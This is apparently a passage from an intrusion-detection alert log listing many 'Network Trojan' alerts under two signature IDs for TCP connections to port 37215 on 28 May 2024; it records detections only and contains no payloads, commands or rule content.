            SID:2829579
            Source Port:36854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620731
            SID:2835222
            Source Port:38154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067447
            SID:2835222
            Source Port:46130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869988
            SID:2829579
            Source Port:33774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809724
            SID:2829579
            Source Port:47610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.468670
            SID:2835222
            Source Port:50326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.878800
            SID:2835222
            Source Port:44302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612969
            SID:2829579
            Source Port:58192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020677
            SID:2829579
            Source Port:48750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043122
            SID:2835222
            Source Port:41988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715648
            SID:2835222
            Source Port:43568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786604
            SID:2835222
            Source Port:37134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956984
            SID:2829579
            Source Port:49992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842957
            SID:2835222
            Source Port:53816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868409
            SID:2835222
            Source Port:42174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936226
            SID:2829579
            Source Port:36302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379805
            SID:2829579
            Source Port:42468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762167
            SID:2835222
            Source Port:58546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.796090
            SID:2829579
            Source Port:51040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748504
            SID:2835222
            Source Port:40816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310436
            SID:2829579
            Source Port:56576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433502
            SID:2835222
            Source Port:44932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935015
            SID:2835222
            Source Port:57108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290275
            SID:2829579
            Source Port:42008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756631
            SID:2829579
            Source Port:50288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854267
            SID:2829579
            Source Port:45134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716509
            SID:2829579
            Source Port:49932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575340
            SID:2835222
            Source Port:60852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818140
            SID:2835222
            Source Port:38616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.041059
            SID:2835222
            Source Port:55110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893058
            SID:2835222
            Source Port:59992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953597
            SID:2829579
            Source Port:51160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669953
            SID:2835222
            Source Port:46494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833735
            SID:2835222
            Source Port:56532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.760365
            SID:2829579
            Source Port:40280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378894
            SID:2829579
            Source Port:55908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.672915
            SID:2829579
            Source Port:52716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930051
            SID:2835222
            Source Port:39766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869664
            SID:2829579
            Source Port:40976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862766
            SID:2835222
            Source Port:46602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442830
            SID:2829579
            Source Port:50748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934274
            SID:2829579
            Source Port:41472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882652
            SID:2829579
            Source Port:52632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010611
            SID:2829579
            Source Port:44152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779210
            SID:2829579
            Source Port:54830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825207
            SID:2829579
            Source Port:47066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388951
            SID:2829579
            Source Port:56182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880211
            SID:2829579
            Source Port:42014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919535
            SID:2829579
            Source Port:50966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.335814
            SID:2829579
            Source Port:54504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841056
            SID:2829579
            Source Port:60926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.964845
            SID:2835222
            Source Port:35002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.347267
            SID:2835222
            Source Port:50860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376624
            SID:2835222
            Source Port:46640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767476
            SID:2835222
            Source Port:43184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.640196
            SID:2829579
            Source Port:39042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856489
            SID:2829579
            Source Port:39326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.494554
            SID:2829579
            Source Port:55130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.873542
            SID:2829579
            Source Port:39604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842818
            SID:2829579
            Source Port:59080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.441400
            SID:2829579
            Source Port:52332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.859607
            SID:2835222
            Source Port:46776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.720796
            SID:2835222
            Source Port:58022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534039
            SID:2835222
            Source Port:39198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026053
            SID:2829579
            Source Port:57112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.867660
            SID:2829579
            Source Port:48296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922279
            SID:2835222
            Source Port:39204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808285
            SID:2835222
            Source Port:52764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893213
            SID:2835222
            Source Port:50066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927561
            SID:2835222
            Source Port:36940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020680
            SID:2835222
            Source Port:39066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804346
            SID:2835222
            Source Port:38208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818235
            SID:2835222
            Source Port:37226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832334
            SID:2829579
            Source Port:32928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762502
            SID:2835222
            Source Port:40982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743921
            SID:2829579
            Source Port:39246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809274
            SID:2829579
            Source Port:40988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.999017
            SID:2829579
            Source Port:51218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937452
            SID:2829579
            Source Port:48956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644349
            SID:2835222
            Source Port:55212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860834
            SID:2829579
            Source Port:56796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.067527
            SID:2835222
            Source Port:35870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.305966
            SID:2835222
            Source Port:50082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918709
            SID:2829579
            Source Port:53370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.488875
            SID:2829579
            Source Port:38032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065910
            SID:2835222
            Source Port:46702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846350
            SID:2829579
            Source Port:51414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871166
            SID:2835222
            Source Port:44358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506874
            SID:2829579
            Source Port:58904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046571
            SID:2835222
            Source Port:41492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.865001
            SID:2835222
            Source Port:55076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836642
            SID:2829579
            Source Port:45732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862269
            SID:2829579
            Source Port:43396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.810437
            SID:2835222
            Source Port:55902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.368975
            SID:2829579
            Source Port:54742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917180
            SID:2835222
            Source Port:37874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450744
            SID:2829579
            Source Port:53236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931683
            SID:2835222
            Source Port:58712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691764
            SID:2835222
            Source Port:47770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917754
            SID:2829579
            Source Port:41872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031088
            SID:2835222
            Source Port:38236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065791
            SID:2835222
            Source Port:52180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290980
            SID:2829579
            Source Port:52998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.845325
            SID:2835222
            Source Port:46426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743289
            SID:2835222
            Source Port:43858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908969
            SID:2829579
            Source Port:59820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891527
            SID:2829579
            Source Port:48152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951280
            SID:2835222
            Source Port:46192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847402
            SID:2835222
            Source Port:47828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.280347
            SID:2829579
            Source Port:53820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858251
            SID:2835222
            Source Port:34776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931130
            SID:2829579
            Source Port:54274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917034
            SID:2835222
            Source Port:41774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349124
            SID:2829579
            Source Port:46690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811892
            SID:2829579
            Source Port:37010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.342009
            SID:2829579
            Source Port:45428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954086
            SID:2835222
            Source Port:42384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.474786
            SID:2829579
            Source Port:35438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.912823
            SID:2835222
            Source Port:47342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880117
            SID:2829579
            Source Port:34088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778304
            SID:2835222
            Source Port:53208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611258
            SID:2835222
            Source Port:60872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309504
            SID:2835222
            Source Port:59120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654623
            SID:2829579
            Source Port:50654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782727
            SID:2829579
            Source Port:48808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.920168
            SID:2829579
            Source Port:45444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046179
            SID:2835222
            Source Port:46054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541645
            SID:2835222
            Source Port:44162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.858047
            SID:2835222
            Source Port:37312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.641144
            SID:2829579
            Source Port:36710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935355
            SID:2829579
            Source Port:59100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908862
            SID:2835222
            Source Port:48766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961089
            SID:2835222
            Source Port:34492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398336
            SID:2829579
            Source Port:49784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.648601
            SID:2829579
            Source Port:43328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378733
            SID:2835222
            Source Port:32862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759848
            SID:2829579
            Source Port:49544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895679
            SID:2835222
            Source Port:47082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969307
            SID:2835222
            Source Port:48582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899969
            SID:2829579
            Source Port:56008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309634
            SID:2835222
            Source Port:58392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056875
            SID:2829579
            Source Port:51330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880514
            SID:2835222
            Source Port:52920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862673
            SID:2829579
            Source Port:38300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.051985
            SID:2835222
            Source Port:58392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280327
            SID:2829579
            Source Port:50860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.774447
            SID:2835222
            Source Port:48212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.776134
            SID:2829579
            Source Port:51644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900748
            SID:2829579
            Source Port:41002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336621
            SID:2829579
            Source Port:41090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626163
            SID:2829579
            Source Port:49844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555206
            SID:2829579
            Source Port:46476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.092156
            SID:2835222
            Source Port:51812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953865
            SID:2829579
            Source Port:60976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030753
            SID:2829579
            Source Port:48636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748257
            SID:2835222
            Source Port:52542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.850213
            SID:2835222
            Source Port:51494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.933976
            SID:2835222
            Source Port:57390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065108
            SID:2835222
            Source Port:38146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.594392
            SID:2835222
            Source Port:43324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.836046
            SID:2829579
            Source Port:50742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.190216
            SID:2829579
            Source Port:48328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809213
            SID:2835222
            Source Port:43310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924328
            SID:2829579
            Source Port:43992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777926
            SID:2835222
            Source Port:40640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918467
            SID:2835222
            Source Port:34218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.544002
            SID:2829579
            Source Port:37312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.398304
            SID:2835222
            Source Port:36846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.822065
            SID:2835222
            Source Port:41864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986589
            SID:2829579
            Source Port:57912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374472
            SID:2835222
            Source Port:51166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929193
            SID:2835222
            Source Port:37678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972015
            SID:2829579
            Source Port:42568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055874
            SID:2835222
            Source Port:42542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908948
            SID:2835222
            Source Port:56692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952480
            SID:2835222
            Source Port:33428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870378
            SID:2835222
            Source Port:44508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691773
            SID:2829579
            Source Port:46832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755881
            SID:2835222
            Source Port:52464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.646548
            SID:2835222
            Source Port:46068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957150
            SID:2829579
            Source Port:34620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709531
            SID:2835222
            Source Port:42760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486543
            SID:2829579
            Source Port:48102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851200
            SID:2835222
            Source Port:34054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058769
            SID:2829579
            Source Port:53718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.863076
            SID:2829579
            Source Port:38338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.941177
            SID:2829579
            Source Port:49314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914021
            SID:2829579
            Source Port:40850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396383
            SID:2829579
            Source Port:36134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773786
            SID:2829579
            Source Port:43800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.187525
            SID:2829579
            Source Port:56278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437245
            SID:2835222
            Source Port:52790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065593
            SID:2835222
            Source Port:35628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.110011
            SID:2829579
            Source Port:55164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644366
            SID:2829579
            Source Port:33212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834441
            SID:2829579
            Source Port:58178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.340051
            SID:2829579
            Source Port:54680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807479
            SID:2829579
            Source Port:60804
            Destination Port:37215
